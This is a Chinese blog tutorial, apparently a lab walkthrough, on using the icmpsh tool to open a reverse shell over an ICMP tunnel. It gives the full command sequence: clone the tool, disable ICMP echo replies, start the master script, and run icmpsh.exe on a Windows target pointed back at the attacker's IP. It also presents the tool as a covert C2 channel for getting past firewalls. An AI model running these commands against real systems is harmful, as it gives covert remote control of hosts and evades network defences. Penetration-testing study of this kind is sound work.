【渗透测试】ICMP隧道技术之icmpsh使用

最新推荐文章于 2024-03-28 22:18:44 发布
最新推荐文章于 2024-03-28 22:18:44 发布
阅读量2k 收藏 9
点赞数
分类专栏: 渗透测试 文章标签: python web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42742658/article/details/120537355
版权

目录

【渗透测试】ICMP隧道技术之icmpsh使用

一、使用场景

icmp隧道技术多用于服务器未开启任何端口时,但能够通过icmp协议通讯,即能够ping通对方

二、icmpsh

icmpsh是一个简单的ICMP反弹shell工具,拥有用C,Perl和Python实现的POSIX兼容主控端和一个win32的受控端。相比其他类似的开源工具来说,icmpsh的优点是在目标机器上运行时不需要管理员权限。
这一工具干净、简单并且便携。受控端(客户端)使用C语言实现。只能运行在目标Windows机器上,而主控端(服务端)由于已经有C和Perl实现的版本,而且之后又移植到了Python上,因此可以运行在任何平台的攻击者机器中。
icmpsh很容易被安装并用作c2通道。可以通过Github下载并在攻击者机器中部署icmpsh。

三、环境

kali:10.43.32.28/24

win7:10.43.32.30/24
同一个网段

1、下载工具:(git或者zip)

git clone https://github.com/inquisb/icmpsh.git

在这里插入图片描述

2、安装需要的python库文件

pip2 install impacket

在这里插入图片描述

3、关闭本机的icmp应答,防止内核对自己的ping包响应

sysctl -w net.ipv4.icmp_echo_ignore_all=1

后面实验结束之后在自行调整过来即可

sysctl -w net.ipv4.icmp_echo_ignore_all=0

在这里插入图片描述

python2 icmpsh_m.py 10.43.32.28  10.43.32.30 
[攻击机ip][目标机ip]

4、目标机执行命令(这里需要各种手段把icmpsh.exe放到目标机上)

icmpsh.exe -t 10.43.32.28
[攻击机ip]

在这里插入图片描述

攻击机上成功反弹shell

在这里插入图片描述

参考:
https://blog.csdn.net/Zlirving_/article/details/113780982?utm_medium=distribute.pc_relevant.none-task-blog-2defaultbaidujs_title~default-0.no_search_link&spm=1001.2101.3001.4242.

https://blog.csdn.net/Zlirving_/article/details/113780982?utm_medium=distribute.pc_relevant.none-task-blog-2defaultbaidujs_title~default-0.no_search_link&spm=1001.2101.3001.4242.

久违 °
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
探秘 ICMPsh:一款隐蔽而强大的远程控制工具
gitblog_00011的博客
03-25 422
探秘 ICMPsh:一款隐蔽而强大的远程控制工具 项目地址:https://gitcode.com/inquisb/icmpsh 项目简介 ICMPsh 是一个开源项目,它允许你在网络中利用ICMP协议进行数据传输和远程控制。这个项目旨在提供一种隐秘的方式来进行系统管理,因为大多数防火墙默认对ICMP(Internet Control Message Protocol)报文是开放的,使得ICMPs...
icmpsh:基于 ICMP 的 shell 工具
gitblog_00096的博客
03-14 358
icmpsh:基于 ICMP 的 shell 工具 icmpsh 是一个基于 ICMP(Internet Control Message Protocol)的 shell 工具,它允许你通过 ICMP 请求在目标主机上执行命令并获取结果。 什么是 ICMPICMP(Internet Control Message Protocol)是 Internet 协议簇的一部分,用于在网络中发送控制...
内网穿透_ICMP_icmpsh
最新发布
tubug的博客
03-28 946
常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。数据包(例如:ping操作)的传输过程中,当目标主机不可达,或者请求超时,都是ICMP在运作(生成相应的错误信息)这样,当其他设备向你的机器发送 ICMP 请求时,icmpsh 可以截获这些请求并作出响应,而不是系统本身去响应。使用 icmpsh 工具时,它会监听网络上的 ICMP 请求,并模拟系统的 ICMP 去响应。为了防止系统本身去响应icmp,所以要关闭本机的icmp响应。
小工具icmpsh的基本操作
carmi的博客
03-10 323
小工具icmpsh的基本操作 基础介绍 原理:通过icmp这个协议进行反弹一个shell 前提条件:Kali(192.168.126.134)与Windows7(192.168.126.129)靶机需要在同一个网段(内网)当中,可以进行通信 操作流程 1、github上下载资源,复制进Kali,进行解压 GitHub - bdamele/icmpsh: Simple reverse ICMP s...
ICMP隧道技术 - icmpsh
shawdow_bug的博客
09-12 956
ICMP隧道工具 icmpsh 使用
隐藏c2隧道---ICMPicmpsh使用
qq_61142406的博客
02-12 3872
隐藏c2隧道---ICMPicmpsh使用
【Pingtunnel工具教程】利用ICMP隧道技术进行ICMP封装穿透防火墙
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
07-19 3350
在一些网络环境中,如果不经过认证,TCP和UDP数据包都会被拦截。如果用户可以ping通远程计算机,就可以尝试建立ICMP隧道,将TCP数据通过该隧道发送,实现不受限的网络访问。用户需要在受限制网络之外,预先启动该工具建立代理服务器。再以客户端模式运行该工具,就可以建立ICMP隧道。为了避免该隧道被滥用,用户还可以为隧道设置使用密码。内网渗透,渗透测试,内网隧道技术。......
icmpsh.zip
05-17
内部网络中的大多数系统都位于防火墙和公司代理之后,以便控制入站和出站Internet流量。...但是大多数情况下允许ICMP流量。因此,可以将此协议用作隐蔽通道,以便获取shell并在目标主机上远程执行命令。
DNS与ICMP隧道资料
11-01
以前自己收集的一些DNS和ICMP隧道技术的文档, 非常有用, 包括源代码及文档资料, 欢迎下载
计算机网络技术基础单元测试题.doc
11-15
这些测试题涉及的知识点反映了计算机网络技术基础的核心内容,包括网络模型、协议栈、数据传输过程、网络设备的使用以及通信协议的作用等。理解和掌握这些知识对于学习和工作在IT领域的人来说至关重要。
ICMP-Tx:ICMP隧道
07-03
ICMP-Tx 创建具有自定义数据内容的 ICMP 数据包。 苹果电脑 你需要root权限才能启动start.py sudo ./start.py
信息安全技术:ICMP协议.pptx
11-01
在信息安全技术领域,网络通信的基础协议之一是Internet Control Message Protocol(ICMP,互联网控制消息协议)。ICMP是TCP/IP协议族的一部分,主要负责在IP层提供错误报告和信息查询功能,帮助网络管理员诊断和...
icmp隧道的利用
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-08 7974
icmp隧道的利用
隐藏通信隧道技术icmpsh反弹shell(网络层ICMP隧道)
bring_coco的博客
01-05 770
优势:不需要开放端口就能通信 常见ICMP的消息是ping命令,通过ping可以得到一些回复 如果HTTP,DNS正反向端口转发不行时候可以尝试ICMP隧道 建立基础:只要能ping通,可以将TCP/UDP数据封装到数据包中,然后利用ping的数据包来穿透防火墙。 实验环境: 1.虚拟机中进行 (kali作为外网机器,monowall1是分隔内外网的防火墙,win7,win2012是两台内网机器) 2.kali的ip:10.0.78.29 Monowall1的ip:1.1.1.1 Win7的ip:1.1.
【内网流量操控技术六】icmp隧道之icmpsh
redwand的博客
02-11 1569
今天是大年三十,先给大家拜个早年,虽然是年末最后一天,但对于有技术信仰的我们来说,其实每一天都是第0天,遂积跬步,记录一篇。前面我们学习了ssh隧道、dns隧道,这些隧道从tcp/ip七层协议来看,多是通过应用层或传输层协议穿透防火墙。那么当防火墙如果不开任何端口,我们应该如何穿透绕过防火墙出站规则呢,本节我们通过学习icmpsh来解决服务器未开端口时,如何通过icmp隧道穿透防火墙,其原理虽然简单,但动手一试发现有很多坑值得避免。
icmp回复报文_安全实验室 | 内网渗透—利用ICMP实现命令控制
weixin_31270363的博客
01-09 445
渗透测试中我们经常会发现一个现象,有些服务器禁用了PING命令甚至是整个ICMP协议,而且这一现象在越是大型的企业中越是明显。可能你会问对于一个小小的ICMP协议来说这有必要吗,答案显然是肯定的。在以前ICMP协议可以说是十分不起眼,但就是让所有人都放松戒备的ICMP协议却成为了攻击者手中的利器。本期美创安全实验室将给大家介绍如何利用ICMP进行命令控制与搭建隐蔽隧道。Part 1IC...
shell 截取ip地址最后一位_利用icmpsh建立icmp隧道反弹shell
weixin_30128407的博客
12-01 145
首先在kali上安装icmpsh软件,软件地址https://github.com/inquisb/icmpsh.git我们可以直接用git克隆过来git clone https://github.com/inquisb/icmpsh.git然后我们还需要来安装python-impacket类库以保证对TCP、UDP、ICMP等协议的访问pip2 install impacket接下来我...
ICMP侦察技术fping使用-渗透测试察打一体(2)
AI
05-13 487
这个工具在每个现代操作系统中几乎都有。对那些最重要的目标来说,ping和traceroute命令很多情况下都是禁用的,而过多地使用这些服务可能会触发网络安全系统中的警报。有了这些安全事件,你的目标肯定会安装和部署针对你的渗透测试的防御措施。它还允许你读取一个写有多个主机名或IP地址的文件,然后对这些主机发送ICMP的echo请求数据包。如果你得到的是超时,那么要么是你的ICMP请求被拦截了,要么是没有目标主机收到你的请求。-i n (在毫秒的时间内) 发送 ping 数据包之间的间隔 (默认为 25)
ICMPSH的学习ICMP反弹shell
来到了学渣的博客
06-04 1346
ICMP隧道 最常见的ping命令就是利用的ICMP协议,使用该协议反弹shell,两台机器不需要开放端口,ICMP隧道简单好用。 实验环境 Kali 192.168.10.144 win7 192.168.10.129 kali安装好icmpsh工具 root@kali:~# git clone https://github.com/inquisb/icmpsh.git 安装icmpsh的依赖包 root@kali:~# apt-get install python-impacket 执行之前最重要
内网渗透--ICMP隧道
05-16
ICMP隧道是一种利用Internet控制消息协议(ICMP)的技术,将其他协议的数据包封装在ICMP数据包中,从而在不被检测的情况下在网络中传输数据。对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

久违 °

小菜鸟就要使劲飞

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值